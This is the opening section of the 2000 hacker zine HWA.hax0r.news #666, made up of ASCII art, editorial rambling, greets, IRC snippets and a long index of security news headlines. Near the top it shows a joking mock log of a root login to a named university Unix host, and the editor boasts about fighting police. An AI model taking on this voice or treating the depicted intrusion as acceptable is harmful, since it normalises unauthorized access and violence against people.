       20-NOV-2000    SR500  --  SR Telecom  --  V4.9      *13:19:31
       User name :                       Log-in menu



                              User name :HWA

                              Password :0WNZU


       YYZ NOV 200 REV B

       =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-
       ==                    <=-[ HWA.hax0r.news ]-=>                   ==  
       ===================================================================
       [=HWA 2000=]     Number 56 Volume 2 Issue *666  *May-Nov 2000    ==
       ===================================================================

      *** SKULLFUCK VERSION MAY-NOV (W/GAPS) 2000 *** CUT'N'PASTE NINJAS ***      
      
      NOV 22 2000      NOV 22 2000      NOV 22 2000      NOV 22 2000
      
      Dates are askew, and it's a bit jumbled; normal service will resume
      shortly, please take a seat and stand back from the doors. #57 is
      already in progress and in more order; we'll backtrack later if it
      is possible and fill in the gap in the history coverage. A LOT has
      happened that is not covered in this issue, excuse the mess. - Ed
      
      
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Unix Guru Sex;
      
      "" talk;touch;finger;unzip;strip;mount;fsck;more;fsck;fsck;more;yes;yes;
         more;fsck;fsck;yes;yes;yes;umount;sleep "" ...
       
       Possible errors;
         
       aborted;child process killed;warning rogue children
       I/O error: device too small
       module not found: insmod penis
       
       tnx to PP/M/#???
       
       
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~       
       
               
    
      You have connected from: r00t3d@well.some.highspeed.net
    
      For assistance call 864-0110 or to report network problems call 864-0200
    
      Login as 'kufacts' for access to the Campus Wide Information System.
               'lynx' for access to the World Wide Web using Lynx.
               'www' for access to the World Wide Web using Lynx.
               'linemode' for access to the World Wide Web using Line Mode.
               'history' for history network resources.
               'ex-ussr' for former Soviet Union info.
     
      At password prompt hit enter.
    
      Digital UNIX (raven.cc.ukans.edu) (ttyp0)
    
      login: root
      Password:
      Last   successful login for kufacts: Sat Oct 23 13:52:10 2000 from is-nulab-pc14.unl.edu
      Last unsuccessful login for kufacts: Fri Apr 11 21:28:26 2000 on ttyp6
    
    
    
      Your Terminal type is unknown!
    
      Enter a terminal type: [vt100]
    
      TERMINAL TYPE IS SET TO vt100
      
      The University of Kansas raven.
                                                
      Connection closed by foreign host.
      # _
                                                
 
      [15:59] <FPatWORK> Unexpected socket error: 10038, SSHSocketv2.cpp: 305
      [16:00] <FPatWORK> are there expected errors?      

      
        [X]  Anarchist party (sic)
       
                             "ABUSUS NON TOLLIT USUM"                          
       
                 *666 READ NOTES ON COVERAGE AND THE HIATUS BELOW
       
       ===================================================================

             
       "ABANDON HOPE ALL YE WHO ENTER HERE..."  - dante's inferno
                       
         "because if big brother isn't looking after us, civilization will 
          cease to exist. Or something." - someone 
          
               
                        
                                                                            
                                 ud$$$**$$$$$$$bc.                          
                              u@**"        4$$$$$$$Nu                       
                            J                ""#$$$$$$r                     
                           @                       $$$$b                    
                         .F                        ^*3$$$                   
                        :% 4                         J$$$N                  
                        $  :F                       :$$$$$                  
                       4F  9                       J$$$$$$$                 
                       4$   k             4$$$$bed$$$$$$$$$                 
                       $$r  'F            $$$$$$$$$$$$$$$$$r                
                       $$$   b.           $$$$$$$$$$$$$$$$$N                
                       $$$$$k 3eeed$$b    $$$Euec."$$$$$$$$$                
        .@$**N.        $$$$$" $$$$$$F'L $$$$$$$$$$$  $$$$$$$                
        :$$L  'L       $$$$$ 4$$$$$$  * $$$$$$$$$$F  $$$$$$F         edNc   
       @$$$$N  ^k      $$$$$  3$$$$*%   $F4$$$$$$$   $$$$$"        d"  z$N  
       $$$$$$   ^k     '$$$"   #$$$F   .$  $$$$$c.u@$$$          J"  @$$$$r 
       $$$$$$$b   *u    ^$L            $$  $$$$$$$$$$$$u@       $$  d$$$$$$ 
        ^$$$$$$.    "NL   "N. z@*     $$$  $$$$$$$$$$$$$P      $P  d$$$$$$$ 
           ^"*$$$$b   '*L   9$E      4$$$  d$$$$$$$$$$$"     d*   J$$$$$r   
                ^$$$$u  '$.  $$$L     "#" d$$$$$$".@$$    .@$"  z$$$$*"     
                  ^$$$$. ^$N.3$$$       4u$$$$$$$ 4$$$  u$*" z$$$"          
                    '*$$$$$$$$ *$b      J$$$$$$$b u$$P $"  d$$P             
                       #$$$$$$ 4$ 3*$"$*$ $"$'c@@$$$$ .u@$$$P               
                         "$$$$  ""F~$ $uNr$$$^&J$$$$F $$$$#                 
                           "$$    "$$$bd$.$W$$$$$$$$F $$"                   
                             ?k         ?$$$$$$$$$$$F'*                     
                              9$$bL     z$$$$$$$$$$$F                       
                               $$$$    $$$$$$$$$$$$$                        
                                '#$$c  '$$$$$$$$$"                          
                                 .@"#$$$$$$$$$$$$b                          
                               z*      $$$$$$$$$$$$N.                       
                             e"      z$$"  #$$$k  '*$$.                     
                         .u*      u@$P"      '#$$c   "$$c                   
                  u@$*"""       d$$"            "$$$u  ^*$$b.               
                :$F           J$P"                ^$$$c   '"$$$$$$bL        
               d$$  ..      @$#                      #$$b         '#$       
               9$$$$$$b   4$$                          ^$$k         '$      
                "$$6""$b u$$                             '$    d$$$$$P      
                  '$F $$$$$"                              ^b  ^$$$$b$       
                   '$W$$$$"                                'b@$$$$"         
                                                            ^$$$*  Gilo95'                      

     NOTE ABOUT THIS RELEASE: *666  >>>READ<<<<
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     There has been just MUCH too much stuff released to possibly cover
     but we'll try if time permits, maybe if i end up in jail i'll use
     the time to complete archives of back issues on my assault charges.
     sigh...

     NOTE#1

     ORIGINAL PLAN: (Is this it? :[  ] YES [ X] NO )      
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     OUR LAST RELEASE was number 53 Volume 2 Issue 5 so we will be releasing      
     TWO versions in a short time, one will be old news near the date of our 
     last release (this one) the other will be NEW news (current material) the 
     GAP? will be filled in later so issues 54 and probably 57 will be released 
     close together with the gap we missed during the archive's hiatus covered 
     at a LATER DATE (hopefully, that's the plan anyways.).

     
     NOTE#2

     POSSIBLY WHAT YOU ARE READING:(Or is it this? [ X] YES [  ] NO)      
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     IT IS POSSIBLE YOU ARE HOLDING A HALLOWEEN HELLBOUND VERSION THAT WILL BE      
     AN UNOFFICIAL OR INCOMPLETE COMPENDIUM OF PAST EVENTS *WITH* THE GAP IN 
     COVERAGE, (U'LL KNOW UNLESS YER DUMB OR BORED IN WHICH CASE THIS IS ALL 
     MOOT) IF SUCH IS THE CASE YOU'LL SEE OLD NEWS A WEIRD GAP OF MASSIVE 
     PROPORTIONS (MONTHS) AND THEN BOOM, RECENT AND INTERESTING (PRESUMABLY) 
     MATERIAL NEAR THE MIDDLE OR END. GOOD LUCK KNOWLEDGE SEEKER, IT IS ALL HERE 
     IF YOU LOOK DEEP ENOUGH, SADLY OLD URLS DIE QUICKLY (ANOTHER GOOD REASON 
     FOR A WORK SUCH AS THIS) SO YOU MAY JUST GET THE HNN SNIPPETS OR HNS 
     WRITEUPS BUT NOT THE FULL ARTICLES TO WHICH YOU ARE ACCUSTOMED. MY 
     APOLOGIES FOR THE MESS AND INDECISION, I AIM TO PLEASE AS MANY PPL AS 
     POSSIBLE (MAINLY ME) AND THEREFORE NO GUARANTEES ARE IMPLIED AS TO THE 
     TIMELINESS OR CONSISTENCY OF CONTENT. SUGGEST YOU ENJOY WHAT IS HERE AND 
     DON'T COMPLAIN. :-O    

     

     RAMBLINGS OF SOME IMPORTANCE (PROBABLY SHOULD READ EM)      
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Once again although referred to as a 'Zine' this is in fact a chronicle or      
     archive of events for any given time period starting in 1998 and following 
     through to present hence my willingness to release issues in such a weird 
     staggered manner. Get over it, you'll live.

     This has several aspects of a zine, some original content (minor) some      
     exclusive interviews, and logs that will not be found elsewhere but it's 
     main purpose for being IS and ALWAYS HAS BEEN to act as a reference work 
     covering as much of the underground and borderline security group releases 
     as possible (the 'zine' is mostly a one man job and therefore seldom 
     complete or covering items as extensively as i'd like) it tends to be an 
     overwhelming and large work whenever it is undertaken but the releases are 
     enjoyed by many making it worth my effort (i'm doing this mainly for my own 
     purposes still btw) and those few dissenters that do emerge are either 
     jealous, people turned down for membership in the HWA group or just plain 
     "dont get it" and can in fact fuck off and die for all I care petulant 
     children and those of bloated egos...  

      Anyway with that nonsense said and this little minor irritation and this      
      explanation out of the way please read on and enjoy what content i've 
      decided to include this issue, including releases from the newly formed 
      HWA Security team (main reason for the hiatus) and check our new site 
      often as a new format is due to be implemented and many new projects of 
      wonder and awe are in the works to be released, check it often and your 
      input in all aspects of our group endeavours are encouraged. We currently 
      number 27 in official active members these are NOT currently (soon) 
      involved in producing this work but I intend to bring some that are of 
      like mind on board to help produce this monstrosity and terrorise small 
      children and sysadmins for many a year to come.

     - Dribbled from Cruci's mind Oct 30th 2000

     
     P.S Do you like how i fluctuate the number of idents from issue to issue? I 
     dont but it annoys some people and I take pleasure in their squirming. 
     Sorry for those caught in the cross fire.

     RECENT EVENTS: (FACT or FICTION? only the chosen KNOW for sure)      
     ~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     RECENT FACTORS AFFECTING THE WAY THIS WAS PRODUCED:
          

     Sept 23rd FPROPHET AND DICENTRA TIED THE KNOT and got married, congrats!      
     same nite:Cruciphux goes to jail charged with assault police officer and 
     disturbing the peace (k i got drunk and some people hassled me coz of my 
     purple hair i ended up fighting three cops and paying the price.) 24hrs in 
     jail, more time in jail likely when trial is over (i beat up three cops, 
     sigh, NOT recommended people.)

     Sometime  digitized pic of Cruci after his beating by the cops is 
     circulated among select people on EFnet. NO you cant request 
     a copy. I'm not proud of what happened it was a fuck up. I fought the law 
     and the law won...

     Sept 26th Cruci in hospital for a week with infected arm (dont ask) another                
     dumb incident, drugs are bad kiddies stick to pez and beer!                    

     Oct 30th  Court date: put over to Nov 20th possibility of no jail and 
     merely probation although one officer almost had his leg 
     broken. (Oh ya dont get on my bad side)

     Oct 31st  Arranged poison and razor blades ready for Halloween night and 
     the black mass held each samhain in my coven (not).
     
     Nov 20th Cruci faced 2yrs in jail and $2000 CDN fine but thanks to a good
     lawyer and due to adult situational extenuating circumstances received a
     suspended sentence and 18 months probation. More details? dont ask. Be
     nice to cops kids, be sure those ppl in plain clothes aren't the fuzz!

   
     ~~~~~~~~ _ _    _  __     _ _  __ _   _      _  ___ _ ~~~~~~~~~~~~~~~~~~~~~~

              Inspirational music: NiN, Marilyn Manson, Killdozer                             
              movies: Not the Ninth Gate Not mission to mars maybe The Haunting 
              The Exorcist, Pitch Black See a trend?                                          

     ~~~~~~~~ _ _    _  __     _ _  __ _   _      _  ___ _~~~~~~~~~~~~~~~~~~~~~~~

                   
     

      [ -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[]
      
      
      
            ____   _    ____  _____ _   _ _____  _    _
           |  _ \ / \  |  _ \| ____| \ | |_   _|/ \  | |
           | |_) / _ \ | |_) |  _| |  \| | | | / _ \ | |
           |  __/ ___ \|  _ <| |___| |\  | | |/ ___ \| |___
           |_| /_/   \_\_| \_\_____|_| \_| |_/_/   \_\_____|
               _    ______     _____ ____   ___  ______   __              
              / \  |  _ \ \   / /_ _/ ___| / _ \|  _ \ \ / /
             / _ \ | | | \ \ / / | |\___ \| | | | |_) \ V /
            / ___ \| |_| |\ V /  | | ___) | |_| |  _ < | |
           /_/   \_\____/  \_/  |___|____/ \___/|_| \_\|_|

             __ ___
            / |( _ )   _
            | |/ _ \ _| |_
            | | (_) |_   _|
            |_|\___/  |_|
      
      [     WARNING                                                           ]
      [     HALLOWEEN/XMAS EDITION 2000                                       ]
      [     EXPLICIT CONTENT                                                  ]
      [     THIS PRODUCT MAY BE HARMFUL OR FATAL IF INFO IS USED              ]
      [     BY YOUNG SCRIPT KIDDIES TO ATTACK OR COMPROMISE SERVERS           ]
      [     DO NOT INTENTIONALLY CONCENTRATE AND INHALE PRODUCT.              ]      
      
      
      
      [ -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[]
    
                            _   _ _______        __
                           | \ | | ____\ \      / /
                           |  \| |  _|  \ \ /\ / /
                           | |\  | |___  \ V  V /
                          _|_| \_|_____|__\_/\_/__  __
                         |  _ \ / _ \| __ ) / _ \ \/ /
                         | |_) | | | |  _ \| | | \  /
                         |  __/| |_| | |_) | |_| /  \
                         |_|    \___/|____/ \___/_/\_\

      
      [ -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[]
      
      
      WE HAVE AN UPDATED MAIL DROP ADDRESS:
      
      HWA 
      P.O BOX 44118
      POSTAL OUTLET UNIT #9
      ONE WEXFORD ROAD
      BRAMPTON, ONTARIO
      CANADA
      L6Z 4V7
      
    
     [ -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] 
     
    
    

     PRELUDE
     ~~~~~~~
                           
     On a popular breakfast cereal:          
              
     The reason it's called "Grape Nuts" is that it contains "dextrose",
     which is also sometimes called "grape sugar", and also because
     "Grape Nuts" is catchier, in terms of marketing, than "A Cross
     Between Gerbil Food and Gravel", which is what it tastes like.
    
                                 - Dave Barry, "Tips for Writer's:
                  
              
              
              
        .,-*-,._.,-*'^'~*-,._.,-*~> *1 <~*-,._.,-*~'^'~*-,._.,-*-,.             
       
             
    HACKING sensibilities do not limit themselves to the realms of computer 
    or telephone networks; they also extend into art and musical expression.
    I coaxed one of our members to share an excerpt of the lyrics from the
    title track of their latest cd release (translated from Croatian). - Ed
    
    
      .,-*-,._.,-*'^'~*-,._.,-*~> *1 <~*-,._.,-*~'^'~*-,._.,-*-,.       
             
             
             "Narko"
              
             "U'r opening the window for a perfect day"
             "just like a scene from hollywood movies"
             "where luck goes in waves"
             "where dust covers all the questions"
             "ooooo am I that old that U forget"
             "ooooo is he that brave that he takes U"
             "that why there are words"
             "for U to lie with them to me"
             "that's why hope exists"
             "for say once again"
             "In my dreams I go to U"
             "In my dreams I always go to U"
             "In my dreams I always go to U"

             
             Pips, chips & Videoclips
             (c) 2000  
             
                      
   ========================================================================== 
                                                       
                                                        
    entropy (ntr-p) 
    n., pl. entropies. 

     1.Symbol S For a closed thermodynamic system, a quantitative measure of
       the amount of thermal energy not available to do work. 
     2.A measure of the disorder or randomness in a closed system. 
     3.A measure of the number of bits necessary to transmit a message as a 
       function of the probability that the message will consist of a specific
       set of symbols. 
   >>4.A hypothetical tendency for all matter and energy in the universe to 
       evolve toward a state of inert uniformity. 
   >>5.Inevitable and steady deterioration of a system or society.                                                         
  
                          ____  _____ ____ ___ _   _
                         | __ )| ____/ ___|_ _| \ | |
                         |  _ \|  _|| |  _ | ||  \| |
                         | |_) | |__| |_| || || |\  |
                         |____/|_____\____|___|_| \_|
                         
                         
     [root@antiv0re]# whatis life
     life: nothing appropriate                    
     [root@antiv0re]# gcc -o god god.c
     [root@antiv0re]# ./god
     [root@antiv0re]# make clean
     [root@antiv0re]# make universe
     make: don't know how to make universe. Stop
     [root@antiv0re]# make dinner
     make: don't know how to make dinner. Stop
     [root@antiv0re]# 
                         
    Ok some greets...
 
    [08:54] <pr0ix> Cruciphux: leave me greets in the zine
    [08:54] <pr0ix> never dont it u gax0r
    [08:54] <pr0ix> hax0r i mean
    [08:55] <Crucitwo> haha
    [08:55] <Crucitwo> yeah i did once
    [08:55] <pr0ix> write: pr0ix still w8ing for the automatic k_____
    [08:55] <pr0ix> :=
    [08:55] <pr0ix> )
    [08:55] <Crucitwo> i took all the greets out
    [08:55] <Crucitwo> yeah ok
    [08:55] <Crucitwo> thats fair
    [08:55] <pr0ix> :)
    [08:55] <Crucitwo> where is it?                      
    
    sorry for bad grammar etc, i'm learnin a little tho.. ;)
    
  pr0ix: dont forget that automatic thingy! you'll get your kl33t HWA shirt ;)
  cpt: hiya man, stay the fuck out of trouble ok? you know what i mean.    
  KrD: Thanks for the interview, hope things work out better than recent shit.
  potgirl : geia sou file mou ;)
  slash: sta ima buraz?
  pr0ix/pek/HET/Mixter/Trudel/#informatic #??? : Bleibt cool broders!
  pip/tnc: bottoms up lads!
  
  And the rest of #darknet, #hwa-security and some other chans i wont bother
  mentioning coz they dont need the publicity...
  
  
  
  
                       _     _
                      | |__ (_)  _ __ ___   ___  _ __ ___
                      | '_ \| |  |'_ ` _ \ / _ \| '_ ` _ \
                      | | | | |  || | | | | (_) | | | | | |
                      |_| |_|_|  || |_| |_|\___/|_| |_| |_| ()

  
                   
    
  =-----------------------------------------------------------------------=

                         Welcome to HWA.hax0r.news ... 

  =-----------------------------------------------------------------------=
   
    
    "If life is a waste of time and time is a waste of life, then lets all get
     wasted and have the time of our lives"
    						- kf

  =--------------------------------------------------------------------------=
  
  
                     _____            _             _  
                    / ____|          | |           | |
                   | |     ___  _ __ | |_ ___ _ __ | |_ ___
                   | |    / _ \| '_ \| __/ _ \ '_ \| __/ __|
                   | |___| (_) | | | | ||  __/ | | | |_\__ \
                    \_____\___/|_| |_|\__\___|_| |_|\__|___/


           
  =--------------------------------------------------------------------------=
  [ INDEX ]                     HWA.hax0r.news                     #666   2000  
  =--------------------------------------------------------------------------=
    Key     Intros                                                         
  =--------------------------------------------------------------------------=
 
    00.0  .. LEGAL & COPYRIGHTS ..............................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. THIS IS WHO WE ARE ..............................................
            
             ABUSUS NON TOLLIT USUM? 
             This is (in case you hadn't guessed) Latin, and loosely translated
             it means "Just because something is abused, it should not be taken
             away from those who use it properly". This is our new motto.
             
   SKULL ASCII: Giles@gevans.demon.co.uk (Gilo)
                ==SKuLL and CroSSBonES==
                

             Wargames:http://roothat.labs.pulltheplug.com/ 

  =--------------------------------------------------------------------------=
    Source Keys                  HWA.hax0r.news                           2000  
  =--------------------------------------------------------------------------=
  
  
    "The three most dangerous things in the world are a programmer with a
     soldering iron, a hardware type with a program patch and a user with
     an idea." - Unknown
     
     [MM]  - Articles from Mass Media sources (Wired MSNBC Reuters etc)
     [IND] - Independent articles or unsolicited material.
     [HWA] - Articles or interviews by HWA Staff members
     [HNN] - Sourced from the Hacker News Network http://www.hackernews.com/
     [HNS] - Sourced from Help Net Security http://net-security.org/
     [403] - Sourced from 403-security http://www.403-security.net/
     [ISN] - Articles from the ISN Mailing list (usually sourced from media)
     [b0f] - Buffer Overflow Security release http://b0f.freebsd.lublin.pl/
     [zsh] - ZSH release http://zsh.interniq.org/
     [COR] - Correction to previous release.
     
   =--------------------------------------------------------------------------=
    Key     Content              HWA.hax0r.news                            2000 
   =--------------------------------------------------------------------------=
       
   <someguy> only a poor workman blames his tools, unless of course those tools
             were written by Microsoft :)
   <some1>   lol
               
     

    01.0  .. GREETS ...........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ............................
     01.2 .. Mailbag ..........................................................
    02.0  .. From the Editor................................................... 
    
    Note: Contents this issue are in particular disarray and follow no real time
          line sorry about this but you should find the content interesting and
          worth reading nonetheless...C*:.    
    
    03.0  .. [HNN] May 09'00 ILOVEYOU Investigation Continues 
    04.0  .. [HNN] May 09'00 Brace Yourselves For the SuperVirus 
    05.0  .. [HNN] May 09'00 NIPC Accused of Dragging Feet 
    06.0  .. [HNN] May 09'00 Classified Systems Hit 
    07.0  .. [HNN] May 09'00 Mitnick in Online Chat 
    08.0  .. [HNN] May 09'00 Phreakers In the White House 
    09.0  .. [HNN] May 09'00 MS vs Netscape in Blame for Security Hole 
    10.0  .. [HNN] May 09'00 Hacker vs. Cracker The Debate Continues 
    11.0  .. [HNN] May 10'00 Buffer Overflow: The Name Game: Groking the Love Bug 
    12.0  .. [HNN] May 10'00 New Virus/Worm On The Loose, Friendmess.A 
    13.0  .. [HNN] May 10'00 YTCracker Busted For Web Defacement 
    14.0  .. [HNN] May 10'00 Gov Security Laws Introduced At Summit 
    15.0  .. [HNN] May 10'00 Internet Fraud Complaint Center Launched By DoJ 
    16.0  .. [HNN] May 10'00 And Yet Another Hole Found In Hotmail 
    17.0  .. [HNN] May 11'00 Solar Sunrise, Now on Video 
    18.0  .. [HNN] May 11'00 Network Manager Sent to Jail For Destroying His Network 
    19.0  .. [HNN] May 11'00 Lawmakers Upset Over ILOVEYOU 
    20.0  .. [HNN] May 11'00 Intel Motherboards Could Destroy Files 
    21.0  .. [HNN] May 11'00 Hackers and the Tools They Use 
    22.0  .. [HNN] May 11'00 HackerNews Brazil and SecureNet Forced To Remove Content 
    23.0  .. [HNN] May 12'00 ILOVEYOU May Have Been An Accident 
    24.0  .. [HNN] May 12'00 Windows Labeled 'Virus Friendly' 
    25.0  .. [HNN] May 12'00 PBS Loses Subscriber Info 
    26.0  .. [HNN] May 12'00 Anonymous User Sues Yahoo For Releasing Identity 
    27.0  .. [HNN] May 12'00 Smart Cards Labeled Secure 
    28.0  .. [HNN] May 12'00 Cyber Attackers on Television 
    29.0  .. [HNN] May 15'00 Love Bug Suspect Denies All 
    30.0  .. [HNN] May 15'00 Microsoft Found to Be Threat to National Security 
    31.0  .. [HNN] May 15'00 G8 to Discuss Cybercrime 
    32.0  .. [HNN] May 15'00 VA Described as Wide Open To Attack 
    33.0  .. [HNN] May 15'00 Bank Web Site Breached 
    34.0  .. [HNN] May 15'00 Koreans Host 'Hacking Contest' 
    35.0  .. [HNN] May 15'00 America's Most Wanted Hit with DoS 
    36.0  .. [HNN] May 15'00 Greisling Responds 
    37.0  .. [HNN] May 17'00 Microsoft Security Spanked Again 
    38.0  .. [HNN] May 17'00 Canada's Big Brother Revealed 
    39.0  .. [HNN] May 17'00 Code on Disk Points Finger At Suspect 
    40.0  .. [HNN] May 17'00 List of ILOVEYOU Suspects Grows 
    41.0  .. [HNN] May 17'00 Return of the Phreaker 
    42.0  .. [HNN] May 17'00 Hope 2000 Announces Plans 
    43.0  .. [HNN] May 17'00 More and more E-zines 
    44.0  .. [HNN] May 18'00 UCITA May Help Computer Attackers 
    45.0  .. [HNN] May 18'00 H.R.3489 To Limit Eavesdropping 
    46.0  .. [HNN] May 18'00 Congressional Records Reveals Officers Social Security Numbers 
    47.0  .. [HNN] May 18'00 G8 Finds No Quick Fix For Cyber Crime 
    48.0  .. [HNN] May 18'00 Philippines Has No CyberCrime Law - Suspect Can Not be Prosecuted 
    49.0  .. [HNN] May 18'00 Multiple Holes Found in Kerberos 
    50.0  .. [HNN] May 18'00 Interview with OpenBSD Creator 
    51.0  .. [HNN] May 18'00 RIAA Looking For Targets     
    52.0  .. [HNN] May 18'00 Canadian BB DB Clippings 
    53.0  .. [HNN] May 19'00 NewLove - Dangerous Variant on the Loose 
    54.0  .. [HNN] May 19'00 Old CIA Head Warns of Spy-Viruses 
    55.0  .. [HNN] May 19'00 Fed Slow In Virus Reaction 
    56.0  .. [HNN] May 19'00 FCC's Attempted Expansion of CALEA In Court 
    57.0  .. [HNN] May 19'00 Russian Computer Crime on the Rise 
    58.0  .. [HNN] May 19'00 J0n Pleads Guilty in Canada 
    59.0  .. [HNN] May 19'00 Electronically Attacking a Bank 
    60.0  .. [HNN] May 22'00 NAI Removes NetBus Pro from Scanner 
    61.0  .. [HNN] May 22'00 Brits Lose Another Laptop 
    62.0  .. [HNN] May 22'00 State Department Audits Missing Laptops 
    63.0  .. [HNN] May 22'00 Researchers Develop New Breed of Security Tool 
    64.0  .. [HNN] May 22'00 Original ILOVEYOU Author Surfaces in Australia 
    65.0  .. [HNN] May 23'00 Secret Searches Reintroduced to Congress 
    66.0  .. [HNN] May 23'00 FTC Wants Control Over Privacy 
    67.0  .. [HNN] May 23'00 Computer Attackers To get Even Higher Sentences 
    68.0  .. [HNN] May 23'00 Australia Loses Sensitive Laptops 
    69.0  .. [HNN] May 23'00 Hong Kong to Create Cyber Response Team 
    70.0  .. [HNN] May 23'00 South Africa Forms CyberCrime Unit 
    71.0  .. [HNN] May 24'00 Info-Con Ratings To Be Used for Cyber Threats 
    72.0  .. [HNN] May 24'00 Ticketmaster to Sell RootFest Tickets 
    73.0  .. [HNN] May 24'00 Zero-Knowledge Teams With IBM 
    74.0  .. [HNN] May 24'00 The Little Miscreants That Could 
    75.0  .. [HNN] May 24'00 French Say No Anonymity on Web 
    76.0  .. [HNN] May 24'00 Experts Stress Education Over Laws 
    77.0  .. [HNN] May 25'00 NHL Hit with DDoS 
    78.0  .. [HNN] May 25'00 FCC Rules Under Appeal 
    79.0  .. [HNN] May 25'00 Privacy Issue Still Hot In DC 
    80.0  .. [HNN] May 25'00 Australia Electoral Information Sold For Tax Mailing 
    81.0  .. [HNN] May 25'00 Cybercops Meet in Boston 
    82.0  .. [HNN] May 25'00 CERT Releases Advisory on Week Old Issue 
    83.0  .. [HNN] May 26'00 Physical Security Is Real Weak 
    84.0  .. [HNN] May 26'00 Reno Does About Face 
    85.0  .. [HNN] May 26'00 Extortionist Busted 
    86.0  .. [HNN] May 26'00 Australian Man Leaks Sewage Via Computer and Radio 
    87.0  .. [HNN] May 26'00 2600 Keeps Lawyer 
    88.0  .. [HNN] May 26'00 Preliminary Defcon Speaking Schedule 
    89.0  .. [HNN] May 26'00 Underground Site Form Alliance 
    90.0  .. [HNN] May 30'00 Viruses, Viruses, and more Viruses 
    91.0  .. [HNN] May 30'00 Resume on the Loose
    92.0  .. [HNN] May 30'00 Gauntlet Firewall Breached 
    93.0  .. [HNN] May 30'00 Software Glitch Short Changes Lottery Winners 
    94.0  .. [HNN] May 30'00 Cyberstalking: Hype or Reality 
    95.0  .. [HNN] May 30'00 Sexy Geeks and Hackers 
    96.0  .. [HNN] May 30'00 DC Metro Web Site Defaced 
    97.0  .. [HNN] May 30'00 Mitnick to Challenge Computer Ban 
    98.0  .. [HNN] May 30'00 Black Hat Posts Speaker Lists, Adds Old Video Clips 
    99.0  .. [IND] Pokemon virus hits U.S. targeting kids
   100.0  .. [HNN] May 31'00 Canada To Dismantle Big Bro Database 
   101.0  .. [HNN] May 31'00 Resume Causes Little Damage 
   102.0  .. [HNN] May 31'00 Hong Kong Pirate Piracy Troubles 
   103.0  .. [HNN] May 31'00 New Zealand Man Claims Virus Info Stolen 
   104.0  .. [HNN] May 31'00 Bank Manager Executed 
   105.0  .. [HNN] May 31'00 Malaysian ISP Suffers Human Error Security Breach 
   106.0  .. [HNN] May 31'00 Defcon Updates Web Site 
   107.0  .. [HNN] May 31'00 SWAT Hits Issue 29 
   108.0  .. [HNN] June 01'00 Pennsylvania Passes Anti-Virus Law 
   109.0  .. [HNN] June 01'00 MLB Practices Security Through Obscurity 
   110.0  .. [HNN] June 01'00 Pr0n Detection Software 
   111.0  .. [HNN] June 01'00 Fighting the Privacy Bootleggers 
   112.0  .. [HNN] June 01'00 Marcia Clark Calls Hackers "Undersocialized Schizoids" 
   113.0  .. [HNN] June 01'00 Fake Census Takers on the Prowl 
   114.0  .. [HNN] June 02'00 Top Ten Internet Security Problems 
   115.0  .. [HNN] June 02'00 MPAA Attempts to Bar Press From Hearings 
   116.0  .. [HNN] June 02'00 Anti-Virus Vendors Blame Media for Virus Hype 
   117.0  .. [HNN] June 02'00 Summercon 2000 
   118.0  .. [HNN] June 02'00 India's First Cyber Criminal Arrested 
   119.0  .. [HNN] June 02'00 Libnet for NT Now Available 
   120.0  .. [HNN] June 05'00 FW-1 Vulnerable to Fragmented Packets 
   121.0  .. [HNN] June 05'00 Australian Tax Office Sells Private Info 
   122.0  .. [HNN] June 05'00 British Have Lost Dozens of Laptops 
   123.0  .. [HNN] June 05'00 S.2448 Analysis 
   124.0  .. [HNN] June 05'00 Spammer Busted For Online Tampering 
   125.0  .. [HNN] June 05'00 Cell Phone Viruses? 
   126.0  .. [HNN] June 07'00 SPAM Worm Hits Cell Phones In Spain 
   127.0  .. [HNN] June 07'00 MafiaBoy to Get New Charges 
   128.0  .. [HNN] June 07'00 CheckPoint Posts Temp Fix for FW-1 Vulnerability 
   129.0  .. [HNN] June 07'00 Air Force Blocks Access to Museum Web Site 
   130.0  .. [HNN] June 07'00 Mounties Fall Behind Crooks in Online Crime 
   131.0  .. [HNN] June 08'00 Accused in ILOVEYOU virus case set free 
   132.0  .. [HNN] June 08'00 Kevin Mitnick Talks About Jobs in Computer Security 
   133.0  .. [HNN] June 08'00 Australia passes law legalizing government computer intrusions 
   134.0  .. [HNN] June 08'00 Press allowed to cover MPAA depositions 
   135.0  .. [HNN] June 08'00 Vulnerability in free mail services found 
   136.0  .. [HNN] June 08'00 OnStar service can unlock car doors 
   137.0  .. [HNN] June 09'00 Thousands of trojaned computers found 
   138.0  .. [HNN] June 09'00 Investigative Report: Female Hackers 
   139.0  .. [HNN] June 09'00 ISS founder is a white hat hacker 
   140.0  .. [HNN] June 09'00 80,000 DNS Domain Server Vulnerable 
   141.0  .. [HNN] June 09'00 Lewis Koch on Winn Schwartau 
   142.0  .. [HNN] June 09'00 Television takes on computer crime 
   143.0  .. [HNN] June 09'00 Top 50 Security Tools Survey 
   144.0  .. [HNN] June 12'00 NETSEC Discovers Nothing New 
   145.0  .. [HNN] June 12'00 Brazilian Telephone Users Privacy Breached 
   146.0  .. [HNN] June 12'00 Dozens of Malaysian Sites Defaced 
   147.0  .. [HNN] June 12'00 Return of FidNet 
   148.0  .. [HNN] June 12'00 H2K Update: Movie Premier, Speaker List 
   149.0  .. [HNN] June 12'00 Another ILOVEYOU Variant Found 
